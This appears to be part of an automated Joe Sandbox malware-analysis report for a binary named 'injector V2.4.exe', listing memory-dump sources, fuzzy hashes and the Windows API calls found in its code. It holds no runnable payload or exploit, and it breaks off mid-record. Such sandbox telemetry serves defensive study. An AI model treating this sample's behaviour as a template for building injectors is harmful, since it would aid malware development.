                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d9fa3b747a8d2419ebfeb7a9e1c2c88648204d5ce45078da1949f3035f47f48a
                                                                                    • Instruction ID: 337ee9a41763cef9e87a3e9ba8ca7bbbbe83c41ac344bc69b86bcb42940e3edd
                                                                                    • Opcode Fuzzy Hash: d9fa3b747a8d2419ebfeb7a9e1c2c88648204d5ce45078da1949f3035f47f48a
                                                                                    • Instruction Fuzzy Hash: D5C1E636204B208B4A388B2865C963D73D3EBD57357795F96D42BCB3E8DB35CD828642
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c294a3fb0ed31826b1d2ed7067dc4f31dcd60eb2a9748b877af8db3fccaabe4d
                                                                                    • Instruction ID: fda560a9801e254daa3b562d67f5843119d9bf34024343f39c50795176f7af62
                                                                                    • Opcode Fuzzy Hash: c294a3fb0ed31826b1d2ed7067dc4f31dcd60eb2a9748b877af8db3fccaabe4d
                                                                                    • Instruction Fuzzy Hash: A4A15B372047048BC62C8B2D99E563E77C3EBE2320B65869FC8135BBE0DE755E45A643
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6fd248431f2ce0840055f3601d2b5564f56b21af9cd763f98ca1cdd83a024352
                                                                                    • Instruction ID: 62eac3744f8ceee564bab7d388e29c8ab2510ae8f244ea029fbeb3679a6b8158
                                                                                    • Opcode Fuzzy Hash: 6fd248431f2ce0840055f3601d2b5564f56b21af9cd763f98ca1cdd83a024352
                                                                                    • Instruction Fuzzy Hash: C2711A3E2153044F4A288A38ADC877EB6D2DFA5324FB987D2D552CB3E5DB21EC458742
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00B2A96A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: A\$A\$A\$U<_k$x"$x"$"!-$"!-
                                                                                    • API String ID: 823142352-2094675021
                                                                                    • Opcode ID: 049ff094814aca753249a77081175a83616643452ee4579a5cc07c0a60e2bc5d
                                                                                    • Instruction ID: e3adb2db089bcfdc2e4f8546a815f12d71891e9d36c909b64975bfbaf9529022
                                                                                    • Opcode Fuzzy Hash: 049ff094814aca753249a77081175a83616643452ee4579a5cc07c0a60e2bc5d
                                                                                    • Instruction Fuzzy Hash: 1251E4322443648BCE2C9A2878E963D62C3ABE6331F3592DBE51F9B6F5CB644C815507
                                                                                    APIs
                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 00B526E2
                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 00B527F0
                                                                                    • CatchIt.LIBVCRUNTIME ref: 00B52841
                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00B52942
                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00B5295D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                    • String ID: csm$csm$csm
                                                                                    • API String ID: 4119006552-393685449
                                                                                    • Opcode ID: 2bdcb8ccc59f528826b422666d78671f02c3ac73dba88527aef0c7ace8a97b52
                                                                                    • Instruction ID: 45a4c17138b49329cb54cc857b4d2e34239410fffe1e70bf8a685df44acc8902
                                                                                    • Opcode Fuzzy Hash: 2bdcb8ccc59f528826b422666d78671f02c3ac73dba88527aef0c7ace8a97b52
                                                                                    • Instruction Fuzzy Hash: 2FB138318022099FCF19DFA4C881AAEBBF5FF19316F1441E9EC116B212D731EA59DB91
                                                                                    APIs
                                                                                    • GetCPInfo.KERNEL32(008A05A0,008A05A0,00000000,7FFFFFFF,?,00B53F31,008A05A0,008A05A0,00000000,008A05A0,?,?,?,?,008A05A0,00000000), ref: 00B53FEC
                                                                                    • __alloca_probe_16.LIBCMT ref: 00B540A7
                                                                                    • __alloca_probe_16.LIBCMT ref: 00B54136
                                                                                    • __freea.LIBCMT ref: 00B54181
                                                                                    • __freea.LIBCMT ref: 00B54187
                                                                                    • __freea.LIBCMT ref: 00B541BD
                                                                                    • __freea.LIBCMT ref: 00B541C3
                                                                                    • __freea.LIBCMT ref: 00B541D3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: __freea$__alloca_probe_16$Info
                                                                                    • String ID:
                                                                                    • API String ID: 127012223-0
                                                                                    • Opcode ID: 0447742c2b698f47873432dcdd49fc57277fe89d1e32482df5cfc4ebc8661ca4
                                                                                    • Instruction ID: ef56e744ecc62a0cdb393fb7d56e5de3f10b317e78d9dbf0201db979e886ab86
                                                                                    • Opcode Fuzzy Hash: 0447742c2b698f47873432dcdd49fc57277fe89d1e32482df5cfc4ebc8661ca4
                                                                                    • Instruction Fuzzy Hash: B47101729007056ADF219F648C81BAE7BFAEF5531AF2800D9ED14B7281D731DDC887A1
                                                                                    APIs
                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00B44997
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___std_exception_copy
                                                                                    • String ID: (^Hx$(^Hx$(^Hx
                                                                                    • API String ID: 2659868963-1348055467
                                                                                    • Opcode ID: e7ab19fc00a675cc0460a21f5787312162d33fd94931c8af76f0f6e8addad2a7
                                                                                    • Instruction ID: 6f58e69f9acafb190962dc9b945ee23934eec273c76a039be9a21e7f5379995f
                                                                                    • Opcode Fuzzy Hash: e7ab19fc00a675cc0460a21f5787312162d33fd94931c8af76f0f6e8addad2a7
                                                                                    • Instruction Fuzzy Hash: 24811B362043005F8B24DA29A9C833E72D1E798321F7C8AD5E5A1CB7E1EF75CA54B742
                                                                                    APIs
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00B49E77
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00B49E7F
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00B49F08
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00B49F33
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00B49F88
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                    • String ID: csm
                                                                                    • API String ID: 1170836740-1018135373
                                                                                    • Opcode ID: 24e524fd0fb79f98a9658a351eb220649c5f459267e1c9b79e84e700a247911c
                                                                                    • Instruction ID: c778cff382c8a130e6a90332a1503ec3ce4e834225436c6d2fe64578e38955a9
                                                                                    • Opcode Fuzzy Hash: 24e524fd0fb79f98a9658a351eb220649c5f459267e1c9b79e84e700a247911c
                                                                                    • Instruction Fuzzy Hash: 0041A334A002199BCF10DF68D881A9FBBE5EF45324F1481D5E8189B392E731EF19DB91
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,E9ED27CF,?,00B4C9A9,?,00B2782F,00000000,00000000), ref: 00B4C95B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID: api-ms-$ext-ms-
                                                                                    • API String ID: 3664257935-537541572
                                                                                    • Opcode ID: 480a960c1a1e2f9d003609983796ca108e9d7d45f0b39af801e2731a75a18c06
                                                                                    • Instruction ID: e78ad31aadc7077bf82e3991a8323a17f6b405207be3a1e0dd368f393e601a96
                                                                                    • Opcode Fuzzy Hash: 480a960c1a1e2f9d003609983796ca108e9d7d45f0b39af801e2731a75a18c06
                                                                                    • Instruction Fuzzy Hash: B021D531A06311BBD7629F68DC80B5A3FE9EB45BA1F1405E0E815A7291DB30EF00E6D1
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,00B4C135,00B49C1D,00B49814), ref: 00B4C14C
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B4C15A
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B4C173
                                                                                    • SetLastError.KERNEL32(00000000,00B4C135,00B49C1D,00B49814), ref: 00B4C1C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    • Opcode ID: 07b574f77fe556f80a5baffd7ea9088b712c2522c6bfe9513aeb4b0484c9e705
                                                                                    • Instruction ID: b2520602d1ed2a7e875443044bea62556673610a05484073213e86828acfb73e
                                                                                    • Opcode Fuzzy Hash: 07b574f77fe556f80a5baffd7ea9088b712c2522c6bfe9513aeb4b0484c9e705
                                                                                    • Instruction Fuzzy Hash: D701D83210A7116DB66527B56CC5F263FD4CB11F7B72003FAF524660E2EE514D057594
                                                                                    Strings
                                                                                    • C:\Users\user\Desktop\injector V2.4.exe, xrefs: 00B4FAD0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: C:\Users\user\Desktop\injector V2.4.exe
                                                                                    • API String ID: 0-660097568
                                                                                    • Opcode ID: 9b523ce69885e20e55402e50f1e1b981a05652e91e36661555709c9526c99c54
                                                                                    • Instruction ID: be1db36567d3007cda6b4feda3c6a409c000ac073bafaa49c81cf6002918b56e
                                                                                    • Opcode Fuzzy Hash: 9b523ce69885e20e55402e50f1e1b981a05652e91e36661555709c9526c99c54
                                                                                    • Instruction Fuzzy Hash: D5216A71600217AF9F20AFB5CCA1D7BB7E9EF0136471185B5F86997251DB30EE00ABA1
                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,E9ED27CF,?,?,00000000,00B563AE,000000FF,?,00B4A9E6,?,?,00B4AA82,788496A7), ref: 00B4A95A
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B4A96C
                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00B563AE,000000FF,?,00B4A9E6,?,?,00B4AA82,788496A7), ref: 00B4A98E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-1276376045
                                                                                    • Opcode ID: 2f298a5ae5b9a4433df680da809e6894f8bb14610e5485a68d845eabd7adc129
                                                                                    • Instruction ID: 24203e575b2ee8810862d8aabf323c60fa59f5a16aed9dcb0b7edf1ccdef18fd
                                                                                    • Opcode Fuzzy Hash: 2f298a5ae5b9a4433df680da809e6894f8bb14610e5485a68d845eabd7adc129
                                                                                    • Instruction Fuzzy Hash: 5301A271950719AFDB128F54DC09BAEBBF8FB44B16F0402A9E811A36E0EB749904CA90
                                                                                    APIs
                                                                                    • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00B528EE,?,?,00000000,00000000,00000000,?), ref: 00B52A0D
                                                                                    • CatchIt.LIBVCRUNTIME ref: 00B52AF3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CatchEncodePointer
                                                                                    • String ID: MOC$RCC
                                                                                    • API String ID: 1435073870-2084237596
                                                                                    • Opcode ID: b6e4811d408807bed3f8830c7fec5037f6a5ed9b320c6411333118b744deacbc
                                                                                    • Instruction ID: e7116953e758f5c15904211e6723982d2739256a9870b911120c3226cebb4c9b
                                                                                    • Opcode Fuzzy Hash: b6e4811d408807bed3f8830c7fec5037f6a5ed9b320c6411333118b744deacbc
                                                                                    • Instruction Fuzzy Hash: 9F414671A01209AFDF25CF98C981AAEBBF5FF09305F1880D9FA0467222E3359A55DB50
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(788496A7,00000000,00000800,?,00B50CBE,?,?,?,?,?,?,00B50B06,00000000,FlsAlloc,00B58060,00B58068), ref: 00B50C2F
                                                                                    • GetLastError.KERNEL32(?,00B50CBE,?,?,?,?,?,?,00B50B06,00000000,FlsAlloc,00B58060,00B58068,?,?,00B4C0EC), ref: 00B50C39
                                                                                    • LoadLibraryExW.KERNEL32(788496A7,00000000,00000000,?,788496A7,?,?,?,?,00B4BD8C,?,?,00B33046,?,00000000,788496A7), ref: 00B50C61
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                    • String ID: api-ms-
                                                                                    • API String ID: 3177248105-2084034818
                                                                                    • Opcode ID: 0c7c7178fa36047d768fd465e6ab4c591f52bdd8015f917f024d956a15e0a438
                                                                                    • Instruction ID: e7ef1ec7c678c422d43911c49b3d9fb70e400363d08cc35714257f308a0f70a9
                                                                                    • Opcode Fuzzy Hash: 0c7c7178fa36047d768fd465e6ab4c591f52bdd8015f917f024d956a15e0a438
                                                                                    • Instruction Fuzzy Hash: 3FE01A30680308BAEA212BA5ED46B1A3F9AEB01B42F1040E0FD0CAC0A1EBA299559584
                                                                                    APIs
                                                                                    • GetConsoleOutputCP.KERNEL32(E9ED27CF,00000000,00000000,?), ref: 00B515E2
                                                                                      • Part of subcall function 00B5010E: WideCharToMultiByte.KERNEL32(?,00000000,00B33046,00000000,00000000,00000000,000000FF,?,?,00000000,00B33046,?,00B4C071,?,00000000,?), ref: 00B5016F
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B51834
                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B5187A
                                                                                    • GetLastError.KERNEL32 ref: 00B5191D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                    • String ID:
                                                                                    • API String ID: 2112829910-0
                                                                                    • Opcode ID: de704682eceb4e38c3b5f09b3cb75fcadd36038b260da3f42776c48b5b55cb81
                                                                                    • Instruction ID: d76d7660a7a8e0b50ab572c5f483a359158408b4c544443337649b5db093b239
                                                                                    • Opcode Fuzzy Hash: de704682eceb4e38c3b5f09b3cb75fcadd36038b260da3f42776c48b5b55cb81
                                                                                    • Instruction Fuzzy Hash: D7D16BB5D002489FDB15CFA8D880BEDBBF5EF09311F2849AAE865EB251D730A945CB50
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustPointer
                                                                                    • String ID:
                                                                                    • API String ID: 1740715915-0
                                                                                    • Opcode ID: c3883cfc76eef90477dc86f80c3d5233577d1adf882329254f29412588d35ced
